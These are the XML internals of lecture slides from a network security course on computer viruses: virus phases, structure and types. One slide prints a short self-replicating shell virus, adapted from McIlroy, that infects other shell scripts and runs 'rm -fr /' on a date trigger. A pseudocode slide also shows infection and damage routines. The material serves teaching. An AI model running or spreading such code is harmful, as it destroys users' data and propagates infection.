                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>A typical virus goes through four phases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>dormant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> phase – waiting on trigger event</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>propagation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> phase – replicating to programs/disks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>triggering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> phase – by event to execute payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> phase – The function of payload is performed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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958466" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Virus Structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="958467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>program V :=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	{goto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	1234567;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	subroutine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infect-executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> :=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		file := get-random-executable-file;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		if (first-line-of-file == 1234567) then goto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		else prepend V to file; }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	subroutine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>do-damage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> :=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	{whatever damage is to be done}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	subroutine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>trigger-pulled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> :=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	{return true if some condition holds}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: main-program :=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infect-executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>trigger-pulled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>do-damage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		goto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="765175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>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960514" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An Example (Shell) Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="960515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1143000"/>
            <a:ext cx="8153400" cy="4981575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#!/bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="1600">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#mcilroy#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="1600">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for f in *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  case `sed 1q $f` in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  "#!/bin/sh")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	      grep '#mcilroy#' $f &gt; /dev/null || sed -n '/#mcilroy#/,$p' $0 &gt;&gt; $f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  esac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>done 2&gt; /dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="1600">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>date=`date +%m%d`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if [ $d -eq "1225" ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    rm -fr /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1600">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Adapted from D. McIlroy: Virology 101</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1600">
              <a:latin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US" smtClean="0"/>
              <a:t>3413ICT Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961538" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Compression Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>By their very nature viruses increase the size of the infected file and thus can be detected;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Compression viruses avoid this:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="961540" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3200400"/>
            <a:ext cx="5867400" cy="3179763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961541" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="5867400"/>
            <a:ext cx="1993900" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" i="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Stallings Fig 19.4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962562" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Types of Viruses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="962563" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Can classify on basis of how they attack: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Parasitic virus,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory-resident virus,</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Boot sector virus, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealth,</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Polymorphic virus, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Macro virus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Hoaxes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963586" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Parasitic Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="963587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Traditional form of virus;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Attaches itself to executable files;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Gains control when the program is executed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Infects other files,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Delivers payload,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Continues with normal execution of infected program.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964610" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Memory Resident Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
